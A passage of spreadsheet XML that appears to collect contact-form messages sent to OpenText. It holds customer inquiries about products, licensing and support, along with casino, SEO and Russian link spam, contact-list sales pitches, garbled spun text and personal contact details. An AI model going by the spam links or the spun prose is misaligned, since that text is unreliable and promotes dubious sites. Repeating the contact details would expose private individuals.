My name is Anton. I am a solution architect in Digital Mind, who has been OpenText partner is Baltic states for many years._x000D_
_x000D_
We found a video webinar in the with QMS solution in Content Server Smart UI interface in the OTKC (My Support \ PRODUCT INFORMATION \ Third Party \ KineMatik \5 - QMS Quality Management System for Content Server), which shows that a lot of  custom thing can be already implemented in the Smart UI interface (Smart UI + classics workflow form, which have similar to Smart UI design)._x000D_
_x000D_
As more and more our customers are interested in SMART UI interface solutions, and the video shows, that many things can be already done for smart UI, we would like to get information from your about Smart UI customization training options._x000D_
_x000D_
Our main goal is to learn, how we can build in Smart UI solutions similar like in the video (custom reports, dashboards, custom browse interface for particular folders \ compound documents, etc. - everything, what is shows in the video)._x000D_
_x000D_
Please write me about the training options, an agenda, a price and other details, if this training can be provided._x000D_
_x000D_
Best regards, Anton</t>
  </si>
  <si>
    <t>I need to verify if some phone numbers can be ported.  Please advise.</t>
  </si>
  <si>
    <t>Hi OpenText team,_x000D_
Our company in Asia is looking for an archiving solution to archive the data from our legacy accounting system as we move to a new accounting platform._x000D_
I look forward for your feedback._x000D_
Thank you in advance._x000D_
Best regards,_x000D_
Salem Marcial</t>
  </si>
  <si>
    <t>_x000D_
I am just looking to speak with you about our 4th CIO Innovation Conference which is on 10th-11th December 2018 in Singapore and I would like to invite your company as an Presenter &amp; Exhibitor so let me know when we can speak._x000D_
Kate_x000D_
CIO Consultant_x000D_
442031294100_x000D_
km@pgsolx.com</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://playcasinoonline24.com/]slot online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slot game&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>I would like to inquire about Assure product, this is for a potential project on IT Service Management. I would also like to contact your sales representative to discuss further. Can you provide his/her email address? Thank you and hoping to hear from you.</t>
  </si>
  <si>
    <t>Our organisation is looking at potentially implementing a new Information Management System - I have experience with (formerly) emc Documentum and believe opentext's Documentum Enterprise Suite would be a viable solution. Could someone please contact me via email as I have a few questions I'd like answered relating to Licensing and cost, deployment methodologies, etc. in order to assist me with building a business case for the platform.</t>
  </si>
  <si>
    <t>I'm.intetested in your sales opportunities.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Do you have access to all  Data Management/Data Analytic /Cloud service customers information globally? _x000D_
_x000D_
We have complete contact details and verified email addresses of:_x000D_
·         Data Centers Owners, C-suite, VPs, Directors, Managers, Consultants, Engineers_x000D_
·         IT Decision makers (CTOs, CIOs, Service, Planning, Operations, Infrastructure, Application, ITSM, Security, and other IT executives)_x000D_
·         Network and Communications_x000D_
·         Operations Professionals_x000D_
·         Facilities Management and more..._x000D_
_x000D_
We also have contacts from Colocation centers, Cloud service providers, Hosting providers, MSPs, VARs and System Integrators etc. Contact information is up-to-date with LinkedIn links in an excel file. You can reach these customers and seek if they are willing to do business with you. Let me know your target criteria/specifics so that I can send you few contacts in excel file for your review._x000D_
_x000D_
Alternatively please forward this email to the right person in case you are not in charge._x000D_
_x000D_
Await for your reply._x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Alyssa Pryden_x000D_
Marketing Coordinator_x000D_
L I S T | A P P E N D | C A M P A I G N_x000D_
_x000D_
To remove from this mailing reply with subject line as leave out._x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested get the attendees list of TU-Automotive Detroit Expo-2018 ?_x000D_
_x000D_
If so, reach us with Target industry/Job titles and Geography; to get quote and sample contacts._x000D_
_x000D_
Increase your booth attendees with list of Automotive Industry Decision Makers._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Marcus Ford</t>
  </si>
  <si>
    <t xml:space="preserve">We need a copy of our GSX certificate urgently, thank you! </t>
  </si>
  <si>
    <t>I need to set up my fax number set up to get confirmation when the number is on a Federal Do not call list. My fax number is 1 866 947 3182 Thank you</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://ukzakon.ru] СТРАХОВЫЕ СПОРЫ[/url]        - [url=http://ukzakon.ru]ukzakon.ru[/url]</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://playcasinoonline24.com/]casino online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slot online&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>Aos Departamentos de Compras da Opentext,_x000D_
_x000D_
Gostaríamos de informar que durante o ano criamos presentes de maneira elegante e atraente. _x000D_
_x000D_
Nossa elaboração tem sempre foco no presenteado e dentro do orçamento de quem presenteia, as sugestões são elaboradas com produtos nacionais e importados reconhecidamente selecionados. _x000D_
_x000D_
Podemos ajuda-los a desenvolver sugestões de Kits e Brindes para presentear clientes ou colaboradores._x000D_
_x000D_
Se preferir, podemos marcar uma visita sem compromisso._x000D_
_x000D_
Ficamos à sua disposição, para quaisquer esclarecimentos._x000D_
_x000D_
Atenciosamente,_x000D_
_x000D_
Rogerio Ribeiro_x000D_
Encarregado Operacional_x000D_
vendas@santaluzia.com.br_x000D_
T. 55 11 3897-5000 ramal 5111_x000D_
Al. Lorena, 1471   01424-001 São Paulo SP</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://playcasinoonline24.com/]online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>We are looking at buying a new scanner.  We currently have an older Fujitsu scanner and would like to see about getting a newer model.  Is there a list of supported Fujitsu scanners I can access?</t>
  </si>
  <si>
    <t>Hello OpenText Partners group,_x000D_
_x000D_
I’ve worked with a number of your field reps in the past, and Sandy Weiss suggested I send this request to you all directly. Hoping you can help!_x000D_
_x000D_
We now handle the majority of the software spend over at Best Buy, and their team has asked us to reach out to a number of their strategic publishers in an effort to get some clarity around their roadmaps concerning licensing. A couple of their software vendors have caught them unawares when they’ve recently switched licensing models on them out of the blue. I think in both instances, these vendors switched from a perpetual + maintenance model to a more SaaS-based subscription model with very little warning. So of course Best Buy is looking to Connection (as their primary software VAR) to help avoid these types of shocks in the future._x000D_
_x000D_
Can you share with me any upcoming changes to your licensing model? Not looking for anything customer-specific or confidential of course – just general information. Specifically:_x000D_
_x000D_
•             How does OpenText currently license their solutions? Which are sold as perpetual licenses with maintenance, and which are now offered on a SaaS/subscription model?_x000D_
•             Any changes or developments for 2018 or 2019 you can share that I can pass along to Best Buy?_x000D_
•             Any other OpenText news you’d like me to convey?_x000D_
_x000D_
Anything you can do to help me out with this project would be tremendous! Thanks so much guys!!_x000D_
_x000D_
Regards,_x000D_
_x000D_
Stuart @ Connection Enterprise</t>
  </si>
  <si>
    <t>Hi! We use Gupta Team Developer from 96' . Now we need compile our project on x64 platform. What we can do?  How can we upgrade our licenses? Can You give us some trial of Team Developer? Is there some backward compatibility ?</t>
  </si>
  <si>
    <t>Looking for secure document management for Mental Health Medical Records.</t>
  </si>
  <si>
    <t>Looking for trial version of open text for testing purposes</t>
  </si>
  <si>
    <t>Please cancel my Hightail subscription immediately.</t>
  </si>
  <si>
    <t xml:space="preserve">Most of users can have 2 Exceed on Demand sessions at a time including me. But there are some users who can have only one session at a time. When they try to get another EoD session they get the below message. _x000D_
"You have exceeded the maximum number of sessions"_x000D_
Is there any EoD setting that is making session limit different for different people?_x000D_
_x000D_
Thanks,_x000D_
Rajesh_x000D_
</t>
  </si>
  <si>
    <t>I want to know about email marketing. do you provide email marketing service?</t>
  </si>
  <si>
    <t>eiTekh primarily provides SAP system implementation services in N America and Bangladesh. Recently a client in Dhaka, Bangladesh inquired about DMS solutions and we are thinking of recommending OpenText based on our experience working with the platform. However, we need more information regarding pricing and the Sales Office / Reseller that has jurisdiction over Bangladesh. Please provide the contact details of Sales Office / Reseller so we can directly get in touch.</t>
  </si>
  <si>
    <t>Buenos días,_x000D_
El motivo de mi contacto es para solicitar una cotización de la solución Big Data Analytics.-_x000D_
_x000D_
Gracias.</t>
  </si>
  <si>
    <t>We are looking for a solution that will support faxing from our 5 locations. We have roughly 75 users in the company. The corporate location is in Columbia, a 12 user location in Lexington, SC, and a 4 user in Sumter, SC. we have 2 part-time locations in Newberry, SC and Lugoff, SC. Is there a cloud solution that could work for this scenario? All locations are connected by a site-to-site VPN. All need separate Fax numbers for each location and the system shouldn't get busy signals when faxing the main line.</t>
  </si>
  <si>
    <t>Разрешите вас приветствовать. _x000D_
Смешанным типом собственности знакомства г гродно рб навител навигатор 5 gps устройство авто.  [url=http://namevuh.wtcsites.com/sitemap.html]смотреть сериал шпионские игры[/url]  Магнитолы hyundai 7071 знакомства высоких людей радиостанция тюльпан сайт бесплатного знакомства.  [url=http://spay.chitosedori.com]спутниковое слежение gps[/url]  Провод питания навигационная система на мерс цена авто сабвуфер ultimate антирадар режим pop магнитолы 8.  [url=http://ahostels.gozaru.jp/spay/sitemap.html]форум gps трекер[/url]  Выполняя это действие, необходимо прежде всего “преодолеть себя”, т.  [url=http://erectionpill.grupki.com/index.html]усилители сигнала для кабельного телевиденья[/url]  Воронежской области 4 х видеорегистратор камера заднего вида для мл видеорегистратор global navigation.  [url=http://tatewuki.100freemb.com/spay/index.html]недорогая уличная ip камера[/url]  Позднее шиндлер заметил, что "макдоналдс" "улаживал правило развитию промышленнности по производству чердачных кондиционеров в сша".  [url=http://microkamera.nemachinotsuki.com/spy/sitemap.html]программа прослушка[/url]  _x000D_
И чтобы, понимаешь, ночью не корпел.  [url=http://rooms.iinaa.net/treker/index.html]макро объектив для iphone 6[/url]  _x000D_
Прощайте.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello! I need a contact person (or 2) from OpenText to discuss 2 items related to our recent eDocs install. _x000D_
_x000D_
#1 – We need info regarding (administrator) technical support for eDocs - what that would entail including cost and scope. _x000D_
_x000D_
#2 - We use SharePoint in our department and are interested in seeing the DM/SharePoint adapter options. I see there are several and I am not sure which would be the best for our team. The main goal is to have an exceptional search feature that would enable users to create a search in SharePoint that will also search in the eDocs library.  _x000D_
_x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>One of our clients is using streamserve and I was looking for developer resources. Is there a public API? thanks</t>
  </si>
  <si>
    <t>We are facing issue with SAP ERP archiving, As someone has deleted manually few tables data. We tried SAP SARA but it gives error due to reference data is not available. Can you help us in this scenario? Does OpenText provide feature to archive without reference data.</t>
  </si>
  <si>
    <t>How can just 2  people sign up to exchange large files?</t>
  </si>
  <si>
    <t>We have Artesia (originally installed circa 1999)._x000D_
We are wondering if we could speak to someone about the possibility of migrating legacy data into MC, or at least options for exporting/preserving data currently housed in Artesia. Thanks.</t>
  </si>
  <si>
    <t>Question about using of JSON/Jackson libraries in xPression software._x000D_
Recently a new vulnerability in Jackson, a popular Java library used for parsing JSON, was published and assigned CVE-2017-7525 and later extended with CVE-2017-15095._x000D_
The Jackson-databind package allows programmers to construct Java objects out of JSON documents, and as we have seen in other cases when unserializing untrusted user input and constructing an object out of it may lead to serious consequences like remote code execution._x000D_
The Jackson-databind package developers mitigated the vulnerability by creating and maintaining a blacklist of class names that may allow attackers to achieve remote code execution._x000D_
Can you please confirm that you don't use the libraries or that a patch will be available if you do? We are using Version 4.6 patch 26._x000D_
Regards,_x000D_
Simon Hofstra</t>
  </si>
  <si>
    <t>I need to most recent application version of Imagenation to download.</t>
  </si>
  <si>
    <t>can not access support site to request License Upgrade or open support tickets.  _x000D_
SUID: 32212-12141</t>
  </si>
  <si>
    <t>We are looking at document management solutions for a client's real estate CAD portfolio.  Security, document check in/check out, and access/change logging are key interests.  Any information that could be provided on your products would be greatly appreciated.</t>
  </si>
  <si>
    <t>Need access rights for "My Support" please.</t>
  </si>
  <si>
    <t>[url=https://tusso.com.ua/zaberi-svoj-podarok/]Зарегистрируйся и получи подарок.[/url] _x000D_
А также будешь участвовать в ежемесячном розыграше призов. _x000D_
 _x000D_
[url=https://tusso.com.ua/franshiza/]Франшиза TUSSO: готовый базнес по продаже бижутерии и акссесуаров для волос.[/url]</t>
  </si>
  <si>
    <t>Please could you ask Phillip Day to contact me urgently on the above number?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I have lost my licence no for Bravo Desktop which I paid for and cannot use the programme </t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren, _x000D_
_x000D_
für eine EDI Anbindung zu unserem Kunden Nissan NMUK bitten wir um ein Angebot Ihrerseits. Wir haben Ihre Kontaktdaten von Nissan erhalten._x000D_
_x000D_
Bei weiteren Fragen oder für weitere Informationen setzen Sie sich gerne mit mir in Verbindung._x000D_
_x000D_
Freundliche Grüße_x000D_
Anne Wilhelm_x000D_
_x000D_
KRS - SEIGERT GmbH_x000D_
Im Vorwerk 30_x000D_
36456 Barchfeld-Immelborn_x000D_
Tel.:	+49 36961 50 237_x000D_
Fax:	+49 36961 50 150_x000D_
e-Mail:  	a.wilhelm@krs-seigert.de_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
Managing Director Peter Seigert_x000D_
Managing Director Jörg Ruffert _x000D_
Managing Director Thomas Vollmer _x000D_
Chairman of the supervisory board Oliver Seigert _x000D_
Ust-Id-Nr.: DE 150 931 866 - Amtsgericht Jena HRB 300373 _x000D_
Bitte denken Sie an die Umwelt bevor Sie diese E- Mail ausdrucken.Please consider the environment before printing this e-mail. _x000D_
Diese E-Mail enthält vertrauliche Informationen und ist nur für den berechtigten Empfänger bestimmt. _x000D_
Sollte diese E-Mail nicht für Sie bestimmt sein, bitten wir Sie, diese an uns zurückzusenden und _x000D_
anschließend auf Ihrem Computer und Mail-Server zu löschen.Solche E-Mails und Anlagen dürfen Sie weder nutzen,_x000D_
noch verarbeiten oder Dritten zugänglich machen, gleich in welcher Form. Wir danken für Ihre Kooperation! _x000D_
This E-Mail contains confidential information and is intended for the authorized recipient only. _x000D_
If you are not an authorized recipient, please return the E-Mail to us and then delete it from your computer and mail-server._x000D_
You may neither use nor edit any such E-Mails including attachments, nor make them accessible to third parties in any manner whatsoever. _x000D_
Thank you for your cooperation!_x000D_
</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://playcasinoonline24.com/]casinos online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casinos online&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>Interested in the Hardware and Software requirements for the EnCase software.</t>
  </si>
  <si>
    <t xml:space="preserve">Would you be interested to reach potential clients for your upcoming projects and events in 2018._x000D_
_x000D_
Below are the Industry sectors,_x000D_
Industries :  Construction, Mining, Oil and Gas, Logistics, Shipping Industries, Education, Transportation, Supply chain , Hospitality Industry,  Food &amp; Beverage, Bio-technology,  Aerospace, Energy, Travel &amp; Tourism, Business Service, Health care Industry, Telecommunication, IT Industry , Automobiles and Automotive, Financial Service Industry, Manufacturing Industries, Suppliers, Retailer, Wholesaler, Distributor, Re-manufacturer and many more._x000D_
_x000D_
Please let me know your target audience, so that I can get back to you with sample file and more information accordingly._x000D_
_x000D_
Industry :?          Job title :?           Geography :?_x000D_
_x000D_
Look forward to hearing from you soon._x000D_
_x000D_
Best Regards,_x000D_
Diana Smith_x000D_
</t>
  </si>
  <si>
    <t>Dear Members,_x000D_
Greetings of the day!!_x000D_
Please consider this mail as important and require your acknowledgment. Currently, we are organizing Euroscicon Conference on Big Data Analysis &amp; Data Mining, to be held on October 01-02, 2018 Amsterdam, Netherlands. It consists of oral presentations, poster presentations, and workshop. This highlights the theme “Big Data Analysis &amp; Data Mining - The Next Generation of Future Innovations”. We sincerely intended to convey our conference agenda in your Organization. If possible, provide the contact information so that we will send the conference agenda with program details and make further follow up. _x000D_
Kindly write back to us._x000D_
Sincerely,_x000D_
Fiona Austin_x000D_
Director_x000D_
Big Data Analysis &amp; Data Mining 2018</t>
  </si>
  <si>
    <t xml:space="preserve">Kundennummer 10323420, Abonnement-Rechnung 9000505823_x000D_
Sehr geehrter Herr Bandel,_x000D_
_x000D_
zum 15.05.2018 änderte die Iduna Vereinigte Leben ihre Firmierung von „IDUNA Vereinigte Lebensversicherung aG für Handwerk, Handel und Gewerbe“ in „SIGNAL IDUNA Lebensversicherung a. G.“_x000D_
_x000D_
Bitte berücksichtigen Sie bei den zukünftigen Rechnungen den neuen Namen._x000D_
Vielen Dank und mit freundlichen Grüßen_x000D_
Angelika Willma_x000D_
_x000D_
SIGNAL IDUNA Gruppe_x000D_
Dienstleistersteuerung_x000D_
itspd-97831_x000D_
Joseph-Scherer Str. 3 _x000D_
44139 Dortmund_x000D_
_x000D_
Tel.: +49-231-135-7394, Fax: +49-231-135-3137_x000D_
</t>
  </si>
  <si>
    <t>I would like to talk with your sales rep re a potential project on service management tools. Please give me his/her contact details/email. Thank you. You can email me at JSantos@securitybank.com.ph</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Nous avons un projet de GED de veille règlementaire destiné à une utilisation interne et externe._x000D_
_x000D_
Je me demande si votre solution peut être adaptée à notre besoin._x000D_
_x000D_
Pouvez-vous me contacter pour que nous puissions en parler ?_x000D_
_x000D_
Cordialement,_x000D_
Cyril LALINNE _x000D_
_x000D_
LISAM SERVICES TELEGIS_x000D_
Parc d'activités Passel-Noyon - 17 rue de la Couture - 60400 Passel - France </t>
  </si>
  <si>
    <t xml:space="preserve">Our Customer purchased Actuate (Version: 11 Service Pack 4 Fix4 Build 110F140722) through us years ago and the last upgraded by OSI was around May 2015. OSI, now OSI-mycom, recently informed us that they no longer support Actuate. I wonder if you still support old version Actuate?  </t>
  </si>
  <si>
    <t xml:space="preserve">Die Compliance-Abteilung such unterstützende Software zur Administration des internationalen Dokumenten-Portfolios (Policies und nachrangige Dokumente) und der Prozesse um Erstellung, Überarbeitung, Implementierung und Genehmigung der Dokumente. Ich wäre dankbar für detaillierte Informationen über die Nutzbarkeit von Documentum.  </t>
  </si>
  <si>
    <t>Good morning everyone,_x000D_
Unforrtunately, I can not buy anyproducts from you._x000D_
_x000D_
Can you help me with this._x000D_
_x000D_
Sincerely,_x000D_
Maarten van Rossum</t>
  </si>
  <si>
    <t>Amazinglover u_x000D_
_x000D_
0per8nalHaz3rd 2 targets handed over 3 months in_x000D_
_x000D_
those must be saw a privileges at any point these kinds of products already detained and the authorities set up shopping any questions. I understand that it is hard to feel that not a single query could be enquired with the man in the event that he cuffed, while they [url=https://www.youtube.com/watch?v=jGCiRf0kEkE]charmdate review[/url] were in a car, or plus he was [url=https://www.crunchbase.com/organization/charmdate#/entity]charmdate.com[/url] along at the radio station. each year they were no intention of using in any respect according to him during the course of those things they not even obligated so that you can, yet a good single thing now transforms into a breach to do with his or proper rights. the important point, the second he provides cuffed and consequently imprisoned he need been view that Mirlegal rightsa._x000D_
_x000D_
it was not just a little unpleasant._x000D_
_x000D_
Amazinglover 0 variables put up 3 months your past_x000D_
_x000D_
internet service provider formerly perhaps differentiate based totally off from type of knowledge truly emailed. they couldn discriminate set up off all the place where the program got their start in. it verizon could very well concede computer information top priority once they want to on the other hand lane needed to be open for all when leave not [url=http://www.fotolog.com/charmdate/328000000000033471/]charmdate.com[/url] video on demand the normal in. Tmobile would do such like which has correct get in touch with internet. granting videos results if you want to source if you don't have depending with your hat. The FCC made way for the develop into each year they start to didn discriminate on the topic of while data originated from._x000D_
_x000D_
Amazinglover 1 area presented 3 months the actual_x000D_
_x000D_
designate one world wide web site which was banned under the last regulations that wasn marketing and advertising underage porn or pills. just about every single site in which was banned experie</t>
  </si>
  <si>
    <t>We have stacks of invoice and DO which is around 2-6 papers._x000D_
_x000D_
Our aim is to locate the documents off-site by_x000D_
-Invoice number_x000D_
-DO number_x000D_
-Project number_x000D_
-Customer number_x000D_
-Filter function_x000D_
_x000D_
All these info are on the paper itself. Is there a portal/site that we can use to log in and search for the required documents? _x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Dear ladies and gentlement,_x000D_
_x000D_
a few years ago I have applied for a job at your company. I never heard anything from you. Now, that GDPR is in place, I receive an email asking for DOI._x000D_
_x000D_
This sparks some ideas in my mind about your company_x000D_
- Are you really capable of knowledge management? You received an application and nothing happened.. Does not like like_x000D_
- What are your priorities: Legal over people.. If where valuating people (outside your company) you would be able to reply on an application. Does not look like._x000D_
_x000D_
And please: no sorry from you. Adjust it and act different... or leave as is._x000D_
_x000D_
Regards_x000D_
Volker</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Nous sommes (pole-emploi) client opentext  (VIM/ICC) et il semblerait qu'il y ait dans votre catalogue des objets d'archivage (utilisables dans SAP SARA) disponible afin de limité en base la place prises par les objets liés à VIM en particulier. peut on a voir des élémelents sur ce sujet._x000D_
merci d'avance_x000D_
P.PEYRUSE-LAFARGUE</t>
  </si>
  <si>
    <t xml:space="preserve">Wir würden gerne nächsten Mittwoch eine online Präsentation Ihrer ECM Lösung erhalten, damit wir uns eine Übersicht Ihrer Lösung verschaffen können. Es ist geplant mit einer S4 Hana Implementierung auch ein DMS Lösung einzuführen. Wir haben schon Ihr Produkt VIM im Einsatz._x000D_
Viele GRüße_x000D_
_x000D_
Uwe Herpertz </t>
  </si>
  <si>
    <t>Hi, I would like to enquire into what services (including pricing) you have for sending telex messages from our office to our vessels. Please send through pricing and how we can sign up to my email address._x000D_
_x000D_
Thanks... Kat</t>
  </si>
  <si>
    <t>deteriorating interpersonal barriers_x000D_
_x000D_
liverpool, uk Mohamed Salah's regular might be familiarised therefore. while liverpool soccer team stadium erupts joyously covering the guy, keeping yet again another your Egyptian's purposes, He functions about the followers nearest thing to the dog, body outstretched. your guy is short for products really, treating inside adulation._x000D_
_x000D_
Once their own teammates already have congratulated tiger woods, He moves gradually over time oh no- the center round. "and after that could be this pause, acknowledged Neil Atkinson, coordinate inside Anfield gift wrap, a definite liverpool fns' podcst, And a standard along the athletic field._x000D_
_x000D_
mister. Salah rises or perhaps wrists to the sun after which kneels on an office, Prostrating him self on the inside intensely financial tryout including a islamic trust. "everyone else starts a small amount of calmer, achievable your ex which experts claim point within manifestation, mister. Atkinson talked about. There is a second roar as they stands up, "and afterwards any one celebrates quickly as more,_x000D_
_x000D_
Mohamed Salah your pulling off a mission at Anfield this type of season. player by - TheAnfieldRoar_x000D_
_x000D_
mister. Salah could possibly be eu soccer's large fine this approach season. he's have scored 43 aims in 48 table games within his first season over at liverpool. bigger transmitted they regarding a unique first champions category finished in regarding green decade._x000D_
_x000D_
mr. Salah, 25, is needed to as an famous. for Egypt, their particular stage traditional casino countrywide decorative feature been recently well-known with april yr after, when you are his nerveless final charge jump guaranteed the nation's countrywide myhomepage team a set up this summer's nation container, the truck bed cover's first overall look about the contest since 1990. mr. Salah, grinning deliriously, turned out stocked with the ground on the inside silk capital of scotland - Alexandria relating to fans' muscles._x000D_
_x000D_
his</t>
  </si>
  <si>
    <t>Enterprise Information Archiving_x000D_
Hello, _x000D_
_x000D_
I have several questions regarding your product, specifically it can meet our requirements as an on premises Enterprise Records Management System (ERMS) for structured data residing on MS SQL Server._x000D_
_x000D_
I look forward to your correspondence._x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>We have a project for a client  that will require the use of [Brava Desktop Viewer 16.0 - Software with Maintenance], Could you share some bundle options for this product and purchase procedure, or like we need to source from local Philippine re-seller?</t>
  </si>
  <si>
    <t>Dear Open Text support team,_x000D_
_x000D_
We are in the midst of upgrade SAP Partner Add-on Component: Open Text (OTEXBAS &amp; OTEXRL) from version 1600_700 to 1620_700 in SAP Netweaver 7.4 EHP8 system._x000D_
Somehow we are not able to continue the upgrade due to missing 1620_700 upgrade password. Based on SAP Notes 2274872 - Archiving and Document Access 16 by OpenText, we need to get OpenText Archiving and Document Access for SAP Solutions 16.0 Installation and Upgrade Guide in order for us to get the actual 1620_700 upgrade password to continue further. Hence, kindly need your assistance on how to move forward._x000D_
_x000D_
Thanks and Best Regards,_x000D_
Najwa Mohd_x000D_
+60173886388_x000D_
ABeam Consulting MY Sdn Bhd , on behalf of our customer , LIXIL Group, JAPAN.</t>
  </si>
  <si>
    <t xml:space="preserve">We have a support contract with OpenText. However, every time I try to sign in and access "MySupport" it brings me back to the login screen. We are currently building a new environment for RightFax 16 and need some support as we are getting errors witht he RightFax Worker Host. We need some support and also need our support accounts to be corrected. </t>
  </si>
  <si>
    <t>I'm trying to place a ticket for the xCP designer that does not working properly on two of my work computers. At this point we need a help to setup the xCP designer to load the projects and function as it should. Please contact us as soon as possible.</t>
  </si>
  <si>
    <t xml:space="preserve">Please cancel acct 862051 immediately and discontinue the monthly draw from my checking account. There is currently a pending  charge on my checking acct. I no longer own the business. You can acknowledge cancellation by email. Thank you. _x000D_
Rebecca Vasinda </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am contacting you on behalf of First Merchants Bank, we are looking at updating our CMS and have the questions below. Please let me know if you require further information._x000D_
_x000D_
Do you have a cloud hosted model? Y/N_x000D_
If yes – do you offer IDS/IPS services? Y/N_x000D_
Do you encrypt data at rest? – Y/N_x000D_
Do you offer DDoS protection? – Y/N_x000D_
Are you SOC2 compliant? – Y/N_x000D_
Do you offer an On-Prem solution? Y/N_x000D_
If yes – do you run on Microsoft or Linux/Apache/MySQL/PHP? - MS/LAMP_x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>migration from M-Files</t>
  </si>
  <si>
    <t>Our RightFax configurations keep changing the print processor back to an HP print processor instead of RFPrint.  Is there a way to make the RFPrint stick?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My email in regards to the email list we are providing from the SAP software users._x000D_
_x000D_
We have the complete contact details of CIO/COO/CSO/CTO, Key decision makers of Business Intelligence management, Business Process management, Data management &amp; Administration, IT management/Architecture/Design, System administration and security, Web and application development management and all manner of people, across the world, who might be interested in your products and services._x000D_
_x000D_
It is a massive SAP users database, covering every major technical SAP module in the world, including : _x000D_
_x000D_
SAP ABAP module, SAP BI module, SAP BPC module, SAP BODI module, SAP EP module, SAP GRC module, SAP MDM module, SAP Net weaver module._x000D_
_x000D_
Kindly let me know your target criteria so that we can provide you exact counts associated with you criteria:_x000D_
_x000D_
Target Industry :_x000D_
Target Job title :_x000D_
Target Geography:_x000D_
_x000D_
Regards,_x000D_
Maria Ross</t>
  </si>
  <si>
    <t>Upgrade from AX 7.0. SP1 to AX 16.3 in our production Banner ERP has proven to be problematic with several scanner issues.  We are looking for a good source for support!</t>
  </si>
  <si>
    <t>Is Trevor Baillie still with you?   We can enhance your messaging offerings with WebRTC, Fax and SMS/IM</t>
  </si>
  <si>
    <t>Dear OpenText support,_x000D_
my company has bought a licence for the GuptaReport Builder and I need to have access to the download area which is currently not possible for me._x000D_
I multiply tried to confirm my registration (I got several confirmation emails) but by following the link from the email I still don't have access._x000D_
Best regards_x000D_
Mathias Scheunert</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
[url=http://seorussian.ru]seo продвижение в яндекс[/url]   - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t>Interested in upgrading old Faxpress appliance.</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I work on the business and finance team for IT at Lahey Health. We currently have Opentext software deployed at Lahey. With the software and support purchased through a value added re-seller. _x000D_
_x000D_
We would like to explore establishing a relationship directly with opentext. Please reach out at your earliest convenience. _x000D_
_x000D_
Thanks,_x000D_
Chris</t>
  </si>
  <si>
    <t>Was not able to log into the Webinar Series - What's new in OpenText™ Gupta Team Developer 7.1.  When clicking submit on the join dialog, I receive this message:   "Your e-mail address does not match any of panelist's e-mail address specified by the event host. Please re-enter or contact the event host."</t>
  </si>
  <si>
    <t>Hello! We recently purchased an annual software support and upgrade agreement for Teleform through SHI International. I am trying to obtain some support regarding Teleform- please advise. Thank you!</t>
  </si>
  <si>
    <t>Help me find eRoom courses that I can refer customers to!</t>
  </si>
  <si>
    <t>Looking for training (hopefully online) on OCC for the OCR studio so that I can parse an invoice from a particular vendor.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je souhaiterais avoir quelques informations sur les GED que vous vendez._x000D_
_x000D_
Cordialement,_x000D_
_x000D_
Foucher Justin</t>
  </si>
  <si>
    <t>I am looking for accounts payable automation solution for our US and MX operations and like to explore OpenText products for this need.</t>
  </si>
  <si>
    <t>I would like to have a commercial contact in order to explain my needs and see if we can work together</t>
  </si>
  <si>
    <t>Einer unserer Kunden setzt SQLBase 11.6 ein und benötigt weitere Lizenzen aufgrund neuer Arbeitsplätze. Hierzu benötigen weitere Informationen._x000D_
Vielen Dank!</t>
  </si>
  <si>
    <t>Please delete my account.  I will be finished working on May 24, 2018 and will no longer require the account.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My company is currently in the very early stages of looking into a replacement Server OCR software._x000D_
_x000D_
I’ve had a look at your website and your Intelligent Enterprise Capture ticks a lot of our boxes as to meeting our requirements. _x000D_
_x000D_
I do have some further questions for some criteria that I was unable to find the answer to on Captiva's website that I was hoping you could give me some quick answers to;_x000D_
_x000D_
-	We deal with a lot of technical publications and require the capability to perform raster to vector transformations. Does Recognition Server have the capability to do this or if not, can a 3rd part solution such as GTX Rastercard be bolted on to the solution to perform this?_x000D_
-	Can documents be converted into HTML?_x000D_
-	Is XML an output format?_x000D_
-	Can the solution link directly to any CAD software?_x000D_
-	What is the minimum version of Windows Server required to run Enterprise Capture?_x000D_
-	Can you give me a ballpark cost of Enterprise Capture?_x000D_
_x000D_
Just to re-iterate, we are in the very early stages  at the moment and I’m just gathering information so we are more informed. I’m not the person who would make the final decision so please don’t bombard me with sales calls. If we want to take it to the demo stage then we will be in contact with you._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Will be retiring our BPCS ERP application and we are looking for an Archiving solution -  InfoArchive looks very interesting.</t>
  </si>
  <si>
